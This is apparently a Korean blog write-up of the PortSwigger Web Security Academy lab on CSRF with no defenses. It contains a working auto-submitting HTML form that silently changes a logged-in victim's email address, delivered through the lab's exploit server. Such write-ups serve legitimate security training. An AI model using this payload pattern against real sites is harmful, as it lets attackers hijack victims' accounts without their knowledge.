반응형
https://portswigger.net/web-security/csrf/lab-no-defenses
Lab: CSRF vulnerability with no defenses | Web Security Academy
This lab's email change functionality is vulnerable to CSRF. To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address ...
portswigger.net
[문제]
[풀이]
문제 설명을 보면
이메일 변경 기능이 취약하고
csrf 공격 html 코드를 짜서
피의자의 이메일 주소를 변경 시키면 문제가 풀린다.
이번 문제에서는 서버가 주어지고
서버로 피의자에게 공격을 할 수 있다.
Burp Suite를 사용해서 패킷을 확인한다.
패킷 정보를 기반으로 HTML 코드를 만들어준다.
<form action="https://0a6800ba03165042804326fc007600c9.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1@google.com">
</form>
<script>document.forms[0].submit()</script>
이런식의 공격 코드를 짤 수 있다.
사실 이번 문제에서는 서버를 이용하는 방법을 잘 몰라서 시간이 오래걸렸다.
그리고 서버에서 Body에 HTML 코드를 넣어주고
View exploit을 눌러 이메일 정보를 확인해보면
이메일이 변경된 걸 확인할 수 있다.
이메일주소를 변경해주고 Deliver exploit to victim 을 눌러서 공격을 진행하면 문제가 풀린다.
반응형